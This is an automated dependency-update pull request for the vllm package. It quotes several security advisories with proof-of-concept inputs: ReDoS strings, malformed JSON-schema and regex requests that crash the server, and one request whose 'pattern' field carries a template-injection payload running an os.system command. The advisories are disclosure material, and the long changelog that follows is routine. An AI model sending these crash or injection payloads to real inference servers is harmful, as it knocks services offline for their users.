Update dependency vllm to v0.9.0 [SECURITY] #8

renovate · 2025-05-28T18:27:38Z

This PR contains the following updates:

Package	Change	Age	Confidence
vllm	`==0.8.5` -> `==0.9.0`

GitHub Vulnerability Alerts

CVE-2025-48887

Summary

A Regular Expression Denial of Service (ReDoS) vulnerability exists in the file vllm/entrypoints/openai/tool_parsers/pythonic_tool_parser.py of the vLLM project. The root cause is the use of a highly complex and nested regular expression for tool call detection, which can be exploited by an attacker to cause severe performance degradation or make the service unavailable.

Details

The following regular expression is used to match tool/function call patterns:

r"\[([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s)?\),\s*)*([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s*)?\)\s*)+\]"

This pattern contains multiple nested quantifiers (*, +), optional groups, and inner repetitions which make it vulnerable to catastrophic backtracking.

Attack Example:
A malicious input such as

[A(A=	)A(A=,		)A(A=,		)A(A=,		)... (repeated dozens of times) ...]

or

"[A(A=" + "\t)A(A=,\t" * repeat

can cause the regular expression engine to consume CPU exponentially with the input length, effectively freezing or crashing the server (DoS).

Proof of Concept:
A Python script demonstrates that matching such a crafted string with the above regex results in exponential time complexity. Even moderate input lengths can bring the system to a halt.

Length: 22, Time: 0.0000 seconds, Match: False
Length: 38, Time: 0.0010 seconds, Match: False
Length: 54, Time: 0.0250 seconds, Match: False
Length: 70, Time: 0.5185 seconds, Match: False
Length: 86, Time: 13.2703 seconds, Match: False
Length: 102, Time: 319.0717 seconds, Match: False

Impact

Denial of Service (DoS): An attacker can trigger a denial of service by sending specially crafted payloads to any API or interface that invokes this regex, causing excessive CPU usage and making the vLLM service unavailable.
Resource Exhaustion and Memory Retention: As this regex is invoked during function call parsing, the matching process may hold on to significant CPU and memory resources for extended periods (due to catastrophic backtracking). In the context of vLLM, this also means that the associated KV cache (used for model inference and typically stored in GPU memory) is not released in a timely manner. This can lead to GPU memory exhaustion, degraded throughput, and service instability.
Potential for Broader System Instability: Resource exhaustion from stuck or slow requests may cascade into broader system instability or service downtime if not mitigated.

Fix

https://github.com/vllm-project/vllm/pull/18454
Note that while this change has significantly improved performance, this regex may still be problematic. It has gone from exponential time complexity, O(2^N), to O(N^2).

GHSA-j828-28rj-hfhp

Summary

A recent review identified several regular expressions in the vllm codebase that are susceptible to Regular Expression Denial of Service (ReDoS) attacks. These patterns, if fed with crafted or malicious input, may cause severe performance degradation due to catastrophic backtracking.

1. vllm/lora/utils.py Line 173

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/lora/utils.py#L173
Risk Description:

The regex r"$(.*?)$\$?$" matches content inside parentheses. If input such as ((((a|)+)+)+) is passed in, it can cause catastrophic backtracking, leading to a ReDoS vulnerability.
Using .*? (non-greedy match) inside group parentheses can be highly sensitive to input length and nesting complexity.

Remediation Suggestions:

Limit the input string length.
Use a non-recursive matching approach, or write a regex with stricter content constraints.
Consider using possessive quantifiers or atomic groups (not supported in Python yet), or split and process before regex matching.

2. vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py Line 52

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py#L52

Risk Description:

The regex r'functools\[(.*?)\]' uses .*? to match content inside brackets, together with re.DOTALL. If the input contains a large number of nested or crafted brackets, it can cause backtracking and ReDoS.

Remediation Suggestions:

Limit the length of model_output.
Use a stricter, non-greedy pattern (avoid matching across extraneous nesting).
Prefer re.finditer() and enforce a length constraint on each match.

3. vllm/entrypoints/openai/serving_chat.py Line 351

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/serving_chat.py#L351

Risk Description:

The regex r'.*"parameters":\s*(.*)' can trigger backtracking if current_text is very long and contains repeated structures.
Especially when processing strings from unknown sources, .* matching any content is high risk.

Remediation Suggestions:

Use a more specific pattern (e.g., via JSON parsing).
Impose limits on current_text length.
Avoid using .* to capture large blocks of text; prefer structured parsing when possible.

4. benchmarks/benchmark_serving_structured_output.py Line 650

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/benchmarks/benchmark_serving_structured_output.py#L650

Risk Description:

The regex r'\{.*\}' is used to extract JSON inside curly braces. If the actual string is very long with unbalanced braces, it can cause backtracking, leading to a ReDoS vulnerability.
Although this is used for benchmark correctness checking, it should still handle abnormal inputs carefully.

Remediation Suggestions:

Limit the length of actual.
Prefer stepwise search for { and } or use a robust JSON extraction tool.
Recommend first locating the range with simple string search, then applying regex.

Fix

https://github.com/vllm-project/vllm/pull/18454

CVE-2025-46570

This issue arises from the prefix caching mechanism, which may expose the system to a timing side-channel attack.

Description

When a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). Our tests revealed that the timing differences caused by matching chunks are significant enough to be recognized and exploited.

For instance, if the victim has submitted a sensitive prompt or if a valuable system prompt has been cached, an attacker sharing the same backend could attempt to guess the victim's input. By measuring the TTFT based on prefix matches, the attacker could verify if their guess is correct, leading to potential leakage of private information.

Unlike token-by-token sharing mechanisms, vLLM’s chunk-based approach (PageAttention) processes tokens in larger units (chunks). In our tests, with chunk_size=2, the timing differences became noticeable enough to allow attackers to infer whether portions of their input match the victim's prompt at the chunk level.

Environment

GPU: NVIDIA A100 (40G)
CUDA: 11.8
PyTorch: 2.3.1
OS: Ubuntu 18.04
vLLM: v0.5.1
Configuration: We launched vLLM using the default settings and adjusted chunk_size=2 to evaluate the TTFT.

Leakage

We conducted our tests using LLaMA2-70B-GPTQ on a single device. We analyzed the timing differences when prompts shared prefixes of 2 chunks, and plotted the corresponding ROC curves. Our results suggest that timing differences can be reliably used to distinguish prefix matches, demonstrating a potential side-channel vulnerability.

Results

In our experiment, we analyzed the response time differences between cache hits and misses in vLLM's PageAttention mechanism. Using ROC curve analysis to assess the distinguishability of these timing differences, we observed the following results:

With a 1-token prefix, the ROC curve yielded an AUC value of 0.571, indicating that even with a short prefix, an attacker can reasonably distinguish between cache hits and misses based on response times.
When the prefix length increases to 8 tokens, the AUC value rises significantly to 0.99, showing that the attacker can almost perfectly identify cache hits with a longer prefix.

Fixes

https://github.com/vllm-project/vllm/pull/17045

CVE-2025-46722

Summary

In the file vllm/multimodal/hasher.py, the MultiModalHasher class has a security and data integrity issue in its image hashing method. Currently, it serializes PIL.Image.Image objects using only obj.tobytes(), which returns only the raw pixel data, without including metadata such as the image’s shape (width, height, mode). As a result, two images of different sizes (e.g., 30x100 and 100x30) with the same pixel byte sequence could generate the same hash value. This may lead to hash collisions, incorrect cache hits, and even data leakage or security risks.

Details

Affected file: vllm/multimodal/hasher.py
Affected method: MultiModalHasher.serialize_item
https://github.com/vllm-project/vllm/blob/9420a1fc30af1a632bbc2c66eb8668f3af41f026/vllm/multimodal/hasher.py#L34-L35
Current behavior: For Image.Image instances, only obj.tobytes() is used for hashing.
Problem description: obj.tobytes() does not include the image’s width, height, or mode metadata.
Impact: Two images with the same pixel byte sequence but different sizes could be regarded as the same image by the cache and hashing system, which may result in:
- Incorrect cache hits, leading to abnormal responses
- Deliberate construction of images with different meanings but the same hash value

Recommendation

In the serialize_item method, serialization of Image.Image objects should include not only pixel data, but also all critical metadata—such as dimensions (size), color mode (mode), format, and especially the info dictionary. The info dictionary is particularly important in palette-based images (e.g., mode 'P'), where the palette itself is stored in info. Ignoring info can result in hash collisions between visually distinct images with the same pixel bytes but different palettes or metadata. This can lead to incorrect cache hits or even data leakage.

Summary:
Serializing only the raw pixel data is insecure. Always include all image metadata (size, mode, format, info) in the hash calculation to prevent collisions, especially in cases like palette-based images.

Impact for other modalities
For the influence of other modalities, since the video modality is transformed into a multi-dimensional array containing the length, width, time, etc. of the video, the same problem exists due to the incorrect sequence of numpy as well.

For audio, since the momo function is not enabled in librosa.load, the loaded audio is automatically encoded into single channels by librosa and returns a one-dimensional array of numpy, thus keeping the structure of numpy fixed and not affected by this issue.

Fixes

https://github.com/vllm-project/vllm/pull/17378

CVE-2025-48942

Summary

Hitting the /v1/completions API with a invalid json_schema as a Guided Param will kill the vllm server

Details

The following API call
(venv) [derekh@ip-172-31-15-108 ]$ curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'
will provoke a Uncaught exceptions from xgrammer in
./lib64/python3.11/site-packages/xgrammar/compiler.py

Issue with more information: https://github.com/vllm-project/vllm/issues/17248

PoC

Make a call to vllm with invalid json_scema e.g. {\"properties\":{\"reason\":{\"type\": \"stsring\"}}}

curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'

Impact

vllm crashes

example traceback

ERROR 03-26 17:25:01 [core.py:340] EngineCore hit an exception: Traceback (most recent call last):
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 333, in run_engine_core
ERROR 03-26 17:25:01 [core.py:340]     engine_core.run_busy_loop()
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 367, in run_busy_loop
ERROR 03-26 17:25:01 [core.py:340]     outputs = step_fn()
ERROR 03-26 17:25:01 [core.py:340]               ^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 181, in step
ERROR 03-26 17:25:01 [core.py:340]     scheduler_output = self.scheduler.schedule()
ERROR 03-26 17:25:01 [core.py:340]                        ^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/core/scheduler.py", line 257, in schedule
ERROR 03-26 17:25:01 [core.py:340]     if structured_output_req and structured_output_req.grammar:
ERROR 03-26 17:25:01 [core.py:340]                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 41, in grammar
ERROR 03-26 17:25:01 [core.py:340]     completed = self._check_grammar_completion()
ERROR 03-26 17:25:01 [core.py:340]                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 29, in _check_grammar_completion
ERROR 03-26 17:25:01 [core.py:340]     self._grammar = self._grammar.result(timeout=0.0001)
ERROR 03-26 17:25:01 [core.py:340]                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 456, in result
ERROR 03-26 17:25:01 [core.py:340]     return self.__get_result()
ERROR 03-26 17:25:01 [core.py:340]            ^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 401, in __get_result
ERROR 03-26 17:25:01 [core.py:340]     raise self._exception
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/thread.py", line 58, in run
ERROR 03-26 17:25:01 [core.py:340]     result = self.fn(*self.args, **self.kwargs)
ERROR 03-26 17:25:01 [core.py:340]              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/__init__.py", line 120, in _async_create_grammar
ERROR 03-26 17:25:01 [core.py:340]     ctx = self.compiler.compile_json_schema(grammar_spec,
ERROR 03-26 17:25:01 [core.py:340]           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/venv/lib64/python3.11/site-packages/xgrammar/compiler.py", line 101, in compile_json_schema
ERROR 03-26 17:25:01 [core.py:340]     self._handle.compile_json_schema(
ERROR 03-26 17:25:01 [core.py:340] RuntimeError: [17:25:01] /project/cpp/json_schema_converter.cc:795: Check failed: (schema.is<picojson::object>()) is false: Schema should be an object or bool
ERROR 03-26 17:25:01 [core.py:340] 
ERROR 03-26 17:25:01 [core.py:340] 
CRITICAL 03-26 17:25:01 [core_client.py:269] Got fatal signal from worker processes, shutting down. See stack trace above for root cause issue.

Fix

https://github.com/vllm-project/vllm/pull/17623

CVE-2025-48943

Impact

A denial of service bug caused the vLLM server to crash if an invalid regex was provided while using structured output. This vulnerability is similar to GHSA-6qc9-v4r8-22xg, but for regex instead of a JSON schema.

Issue with more details: https://github.com/vllm-project/vllm/issues/17313

Patches

https://github.com/vllm-project/vllm/pull/17623

CVE-2025-48944

Summary

The vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted.

Details

The "type" field is expected to be one of: "string", "number", "object", "boolean", "array", or "null". Supplying any other value will cause the worker to crash with the following error:

RuntimeError: [11:03:34] /project/cpp/json_schema_converter.cc:637: Unsupported type "something_or_nothing"

The "pattern" field undergoes Jinja2 rendering (I think) prior to being passed unsafely into the native regex compiler without validation or escaping. This allows malformed expressions to reach the underlying C++ regex engine, resulting in fatal errors.

For example, the following inputs will crash the worker:

Unclosed {, [, or (

Closed:{} and []

Here are some of runtime errors on the crash depending on what gets injected:

RuntimeError: [12:05:04] /project/cpp/regex_converter.cc:73: Regex parsing error at position 4: The parenthesis is not closed.
RuntimeError: [10:52:27] /project/cpp/regex_converter.cc:73: Regex parsing error at position 2: Invalid repetition count.
RuntimeError: [12:07:18] /project/cpp/regex_converter.cc:73: Regex parsing error at position 6: Two consecutive repetition modifiers are not allowed.

PoC

Here is the POST request using the type field to crash the worker. Note the type field is set to "something" rather than the expected types it is looking for:
POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 579
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

{
"model": "mistral-nemo-instruct",
"messages": [{ "role": "user", "content": "crash via type" }],
"tools": [
{
"type": "function",
"function": {
"name": "crash01",
"parameters": {
"type": "object",
"properties": {
"a": {
"type": "something"
}
}
}
}
}
],
"tool_choice": {
"type": "function",
"function": {
"name": "crash01",
"arguments": { "a": "test" }
}
},
"stream": false,
"max_tokens": 1
}

Here is the POST request using the pattern field to crash the worker. Note the pattern field is set to a RCE payload, it could have just been set to {{}}. I was not able to get RCE in my testing, but is does crash the worker.

POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 718
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

{
"model": "mistral-nemo-instruct",
"messages": [
{
"role": "user",
"content": "Crash via Pattern"
}
],
"tools": [
{
"type": "function",
"function": {
"name": "crash02",
"parameters": {
"type": "object",
"properties": {
"a": {
"type": "string",
"pattern": "{{ import('os').system('echo RCE_OK > /tmp/pwned') or 'SAFE' }}"
}
}
}
}
}
],
"tool_choice": {
"type": "function",
"function": {
"name": "crash02"
}
},
"stream": false,
"max_tokens": 32,
"temperature": 0.2,
"top_p": 1,
"n": 1
}

Impact

Backend workers can be crashed causing anyone to using the inference engine to get 500 internal server errors on subsequent requests.

Fix

https://github.com/vllm-project/vllm/pull/17623

Release Notes

vllm-project/vllm (vllm)

`v0.9.0`

Compare Source

Highlights

This release features 649 commits, from 215 contributors (82 new contributors!)

vLLM has upgraded to PyTorch 2.7! (#16859) This is a breaking change for environment dependency.
- The default wheel has been upgraded from CUDA 12.4 to CUDA 12.8. We will distribute CUDA 12.6 wheel on GitHub artifact.
- As a general rule of thumb, our CUDA version policy follow PyTorch's CUDA version policy.
Enhanced NVIDIA Blackwell support. vLLM now ships with initial set of optimized kernels on NVIDIA Blackwell with both attention and mlp.
- You can use our docker image or install FlashInfer nightly wheel pip install https://download.pytorch.org/whl/cu128/flashinfer/flashinfer_python-0.2.5%2Bcu128torch2.7-cp38-abi3-linux_x86_64.whl then set VLLM_ATTENTION_BACKEND=FLASHINFER for better performance.
- Upgraded support for the new FlashInfer main branch. (#15777)
- Please checkout https://github.com/vllm-project/vllm/issues/18153 for the full roadmap
Initial DP, EP, PD support for large scale inference
- EP:
  - Permute and unpermute kernel for moe optimization (#14568)
  - Modularize fused experts and integrate PPLX kernels (#15956)
  - Refactor pplx init logic to make it modular (prepare for deepep) (#18200)
  - Add ep group and all2all interface (#18077)
- DP:
  - Decouple engine process management and comms (#15977)
- PD:
  - NIXL Integration (#17751)
  - Local attention optimization for NIXL (#18170)
  - Support multiple kv connectors (#17564)
Migrate docs from Sphinx to MkDocs (#18145, #18610, #18614, #18616. #18622, #18626, #18627, #18635, #18637, #18657, #18663, #18666, #18713)

Notable Changes

Removal of CUDA 12.4 support due to PyTorch upgrade to 2.7.
Change top_k to be disabled with 0 (still accept -1 for now) (#17773)
The seed is now set to 0 by default for V1 Engine, meaning that different vLLM runs now yield the same outputs even if temperature > 0. This does not modify the random state in user code since workers are run in separate processes unless VLLM_USE_V1_MULTIPROCESSING=0. (#17929, #18741)

Model Enhancements

Support MiMo-7B (#17433), MiniMax-VL-01 (#16328), Ovis 1.6 (#17861), Ovis 2 (#15826), GraniteMoeHybrid 4.0 (#17497), FalconH1* (#18406), LlamaGuard4 (#17315)
- Please install the development version of transformers (from source) to use Falcon-H1.
Embedding models: nomic-embed-text-v2-moe (#17785), new class of gte models (#17986)
Progress in Hybrid Memory Allocator (#17394, #17479, #17474, #17483, #17193, #17946, #17945, #17999, #18001, #18593)
DeepSeek: perf enhancement by moving more calls into cuda-graph region(#17484, #17668), Function Call (#17784), MTP in V1 (#18435)
Qwen2.5-1M: Implements dual-chunk-flash-attn backend for dual chunk attention with sparse attention support (#11844)
Qwen2.5-VL speed enhancement via rotary_emb optimization (#17973)
InternVL models with Qwen2.5 backbone now support video inputs (#18499)

Performance, Production and Scaling

Support full cuda graph in v1 (#16072)
Pipeline Parallelism: MultiprocExecutor support (#14219), torchrun (#17827)
Support sequence parallelism combined with pipeline parallelism (#18243)
Async tensor parallelism using compilation pass (#17882)
Perf: Use small max_num_batched_tokens for A100 (#17885)
Fast Model Loading: Tensorizer support for V1 and LoRA (#17926)
Multi-modality: Automatically cast multi-modal input dtype before transferring device (#18756)

Security

Prevent side-channel attacks via cache salting (#17045)
Fix image hash collision in certain edge cases (#17378)
Add VLLM_ALLOW_INSECURE_SERIALIZATION env var (#17490)
Migrate to REGEX Library to prevent catastrophic backtracking (#18454, #18750)

Features

CLI: deprecated=True (#17426)
Frontend: progress bar for adding requests (#17525), chat_template_kwargs in LLM.chat (#17356), /classify endpoint (#17032), truncation control for embedding models (#14776), cached_tokens in response usage (#18149)
LoRA: default local directory LoRA resolver plugin. (#16855)
Metrics: kv event publishing (#16750), API for accessing in-memory Prometheus metrics (#17010)
Quantization: nvidia/DeepSeek-R1-FP4 (#16362), Quark MXFP4 format (#16943), AutoRound (#17850), torchao models with AOPerModuleConfig (#17826), CUDA Graph support for V1 GGUF support (#18646)
Reasoning: deprecate --enable-reasoning (#17452)
Spec Decode: EAGLE share input embedding (#17326), torch.compile & cudagraph to EAGLE (#17211), EAGLE3 (#17504), log accumulated metrics(#17913), Medusa (#17956)
Structured Outputs: Thinking compatibility (#16577), Spec Decoding (#14702), Qwen3 reasoning parser (#17466), tool_choice: required for Xgrammar (#17845), Structural Tag with Guidance backend (#17333)
Transformers backend: named parameters (#16868), interleaved sliding window attention (#18494)

Hardwares

NVIDIA: cutlass support for blackwell fp8 blockwise gemm (#14383)
TPU: Multi-LoRA implementation(#14238), default max-num-batched-tokens (#17508), V1 backend by default (#17673), top-logprobs (#17072)
Neuron: NeuronxDistributedInference support (#15970), Speculative Decoding, Dynamic on-device sampling (#16357), Mistral Model (#18222), Multi-LoRA (#18284)
AMD: Enable FP8 KV cache on V1 (#17870), Tuned fused moe config for Qwen3 MoE on MI300X (#17535, #17530), AITER biased group topk (#17955), Block-Scaled GEMM (#14968), MLA (#17523), Radeon GPU use Custom Paged Attention (#17004), reduce the number of environment variables in command line (#17229)
Extensibility: Make PiecewiseBackend pluggable and extendable (#18076)

Documentation

Update quickstart and install for cu128 using --torch-backend=auto (#18505)
NVIDIA TensorRT Model Optimizer (#17561)
Usage of Qwen3 thinking (#18291)

Developer Facing

Benchmark: Add single turn MTBench to Serving Bench (#17202)
Usability: Decrease import time of vllm.multimodal (#18031)
Code Format: Code formatting using ruff format (#17656, #18068, #18400)
Readability:
- Configuration and arguments unification is now complete! (#17130, #17453, #17562)
- Update deprecated type hinting from Python 3.7 (#18056, #18130, #18132, #18129, #18073, #18072, #18126, #18128, #18057, #18058)
Process:
- Propose a deprecation policy for the project (#17063)
Testing: expanding torch nightly tests (#18004)

What's Changed

Support loading transformers models with named parameters by @wuisawesome in https://github.com/vllm-project/vllm/pull/16868
Add tuned triton fused_moe configs for Qwen3Moe by @mgoin in https://github.com/vllm-project/vllm/pull/17328
[Benchmark] Add single turn MTBench to Serving Bench by @ekagra-ranjan in https://github.com/vllm-project/vllm/pull/17202
[Optim] Compute multimodal hash only once per item by @DarkLight1337 in https://github.com/vllm-project/vllm/pull/17314
implement Structural Tag with Guidance backend by @mmoskal in https://github.com/vllm-project/vllm/pull/17333
[V1][Spec Decode] Make Eagle model arch config driven by @ekagra-ranjan in https://github.com/vllm-project/vllm/pull/17323
[model] make llama4 compatible with pure dense layers by @luccafong in https://github.com/vllm-project/vllm/pull/17315
[Bugfix] Fix numel() downcast in fused_layernorm_dynamic_per_token_quant.cu by @r-barnes in https://github.com/vllm-project/vllm/pull/17316
Ignore '<string>' filepath by @zou3519 in https://github.com/vllm-project/vllm/pull/17330
[Bugfix] Add contiguous call inside rope kernel wrapper by @timzsu in https://github.com/vllm-project/vllm/pull/17091
[Misc] Add a Jinja template to support Mistral3 function calling by @chaunceyjiang in https://github.com/vllm-project/vllm/pull/17195
[Model] support MiniMax-VL-01 model by @qscqesze in https://github.com/vllm-project/vllm/pull/16328
[Misc] Move config fields to MultiModalConfig by @DarkLight1337 in https://github.com/vllm-project/vllm/pull/17343
[Misc]Use a platform independent interface to obtain the device attributes by @ponix-j in https://github.com/vllm-project/vllm/pull/17100
[Fix] Documentation spacing in compilation config help text by @Zerohertz in https://github.com/vllm-project/vllm/pull/17342
[Build][Bugfix] Restrict setuptools version to <80 by @gshtras in https://github.com/vllm-project/vllm/pull/17320
[Model] Ignore rotary embed load for Cohere model by @ekagra-ranjan in https://github.com/vllm-project/vllm/pull/17319
Update docs requirements by @hmellor in https://github.com/vllm-project/vllm/pull/17379
[Doc] Fix QWen3MOE info by @jeejeelee in https://github.com/vllm-project/vllm/pull/17381
[Bugfix] Clean up MiniMax-VL and fix processing by @DarkLight1337 in https://github.com/vllm-project/vllm/pull/17354
pre-commit autoupdate by @hmellor in https://github.com/vllm-project/vllm/pull/17380
[Frontend] Support chat_template_kwargs in LLM.chat by @DarkLight1337 in https://github.com/vllm-project/vllm/pull/17356
Transformers backend tweaks by @hmellor in https://github.com/vllm-project/vllm/pull/17365
Fix: Spelling of inference by @a2q1p in https://github.com/vllm-project/vllm/pull/17387
Improve literal dataclass field conversion to argparse argument by @hmellor in https://github.com/vllm-project/vllm/pull/17391
[V1] Remove num_input_tokens from attn_metadata by @heheda12345 in https://github.com/vllm-project/vllm/pull/17193
[Bugfix] add qwen3 reasoning-parser fix content is None when disable … by @mofanke in https://github.com/vllm-project/vllm/pull/17369
fix gemma3 results all zero by @mayuyuace in https://github.com/vllm-project/vllm/pull/17364
[Misc][ROCm] Exclude cutlass_mla_decode for ROCm build by @tywuAMD in https://github.com/vllm-project/vllm/pull/17289
Enabling multi-group kernel tests. by @Alexei-V-Ivanov-AMD in https://github.com/vllm-project/vllm/pull/17115
[Docs] Propose a deprecation policy for the project by @russellb in https://github.com/vllm-project/vllm/pull/17063
[Doc][Typo] Fixing label in new model requests link in overview.md by @casinca in https://github.com/vllm-project/vllm/pull/17400
[TPU][V1][CI] Replace python3 setup.py develop with standard pip install --e on TPU by @NickLucche in https://github.com/vllm-project/vllm/pull/17374
[CI] Uses Python 3.11 for TPU by @aarnphm in https://github.com/vllm-project/vllm/pull/17359
[CI/Build] Add retry mechanism for add-apt-repository by @reidliu41 in https://github.com/vllm-project/vllm/pull/17107
[Bugfix] Fix Minicpm-O-int4 GPTQ model inference by @Isotr0py in https://github.com/vllm-project/vllm/pull/17397
Simplify (and fix) passing of guided decoding backend options by @hmellor in https://github.com/vllm-project/vllm/pull/17008
Remove Falcon3 2x7B from CI by @hmellor in https://github.com/vllm-project/vllm/pull/17404
Fix: Python package installation for opentelmetry by @dilipgb in https://github.com/vllm-project/vllm/pull/17049
[V1][Spec Decode] Apply torch.compile & cudagraph to EAGLE by @luyuzhe111 in https://github.com/vllm-project/vllm/pull/17211
Remove Bamba 9B from CI by @hmellor in https://github.com/vllm-project/vllm/pull/17407
[V1][Feature] Enable Speculative Decoding with Structured Outputs by @benchislett in https://github.com/vllm-project/vllm/pull/14702
[release] Always git fetch all to get latest tag on TPU release by @khluu in https://github.com/vllm-project/vllm/pull/17322
Truncation control for embedding models by @gmarinho2 in https://github.com/vllm-project/vllm/pull/14776
Update PyTorch to 2.7.0 by @huydhn in https://github.com/vllm-project/vllm/pull/16859
Improve configs - ModelConfig by @hmellor in https://github.com/vllm-project/vllm/pull/17130
Fix call to logger.info_once by @hmellor in https://github.com/vllm-project/vllm/pull/17416
Fix some speculative decode tests with tl.dot by @huydhn in https://github.com/vllm-project/vllm/pull/17371
Support LoRA for Mistral3 by @mgoin in https://github.com/vllm-project/vllm/pull/17428
[Intel GPU] [CI]Fix XPU ci, setuptools >=80.0 have build issue by @jikunshang in https://github.com/vllm-project/vllm/pull/17298
[Hardware][Intel GPU] Upgrade to torch 2.7 by @jikunshang in https://github.com/vllm-project/vllm/pull/17444
[Bugfix] Fix AttributeError: 'State' object has no attribute 'engine_client' by @chaunceyjiang in https://github.com/vllm-project/vllm/pull/17434
[MODEL ADDITION] Ovis2 Model Addition by @mlinmg in https://github.com/vllm-project/vllm/pull/15826
Make the _apply_rotary_emb compatible with dynamo by @houseroad in https://github.com/vllm-project/vllm/pull/17435
[Misc] Remove deprecated files by @chaunceyjiang in https://github.com/vllm-project/vllm/pull/17447
[V1][Bugfix]: vllm v1 verison metric num_gpu_blocks is None by @lengrongfu in https://github.com/vllm-project/vllm/pull/15755
[TPU][V1][CI] Update regression test baseline for v6 CI by @NickLucche in https://github.com/vllm-project/vllm/pull/17064
[Core] Prevent side-channel attacks via cache salting by @dr75 in https://github.com/vllm-project/vllm/pull/17045
[V1][Metrics] add support for kv event publishing by @alec-flowers in https://github.com/vllm-project/vllm/pull/16750
[Feature] The Qwen3 reasoning parser supports guided decoding by @chaunceyjiang in https://github.com/vllm-project/vllm/pull/17466
[Docs] Add command for running mypy tests from CI by @russellb in https://github.com/vllm-project/vllm/pull/17475
[Fix] Support passing args to logger by @aarnphm in https://github.com/vllm-project/vllm/pull/17425
[Bugfix] Fixed mistral tokenizer path when pointing to file by @psav in https://github.com/vllm-project/vllm/pull/17457
[V1] Allow turning off pickle fallback in vllm.v1.serial_utils by @russellb in https://github.com/vllm-project/vllm/pull/17427
[Docs] Update optimization.md doc by @mgoin in https://github.com/vllm-project/vllm/pull/17482
[BugFix] Fix authorization of openai_transcription_client.py by @hhy3 in https://github.com/vllm-project/vllm/pull/17321
[Bugfix][ROCm] Restrict ray version due to a breaking release by @gshtras in https://github.com/vllm-project/vllm/pull/17480
[doc] add install tips by @reidliu41 in https://github.com/vllm-project/vllm/pull/17373
doc: fix bug report Github template formatting by @davidxia in https://github.com/vllm-project/vllm/pull/17486
[v1][Spec Decode] Make sliding window compatible with eagle prefix caching by @heheda12345 in https://github.com/vllm-project/vllm/pull/17398
Bump Compressed Tensors version to 0.9.4 by @rahul-tuli in https://github.com/vllm-project/vllm/pull/17478
[Misc] Rename Audios -> Audio in Qwen2audio Processing by @alex-jw-brooks in https://github.com/vllm-project/vllm/pull/17507
[CI][TPU] Skip Multimodal test by @lsy323 in https://github.com/vllm-project/vllm/pull/17488
[Bugfix][ROCm] Fix import error on ROCm by @gshtras in https://github.com/vllm-project/vllm/pull/17495
[Bugfix] Temporarily disable gptq_bitblas on ROCm by @nlzy in https://github.com/vllm-project/vllm/pull/17411
[CI][TPU] Skip structured outputs+spec decode tests on TPU by @mgoin in https://github.com/vllm-project/vllm/pull/17510
[CI][Bugfix] Fix failing V1 Test due to missing 'cache_salt' arg by @mgoin in https://github.com/vllm-project/vllm/pull/17500
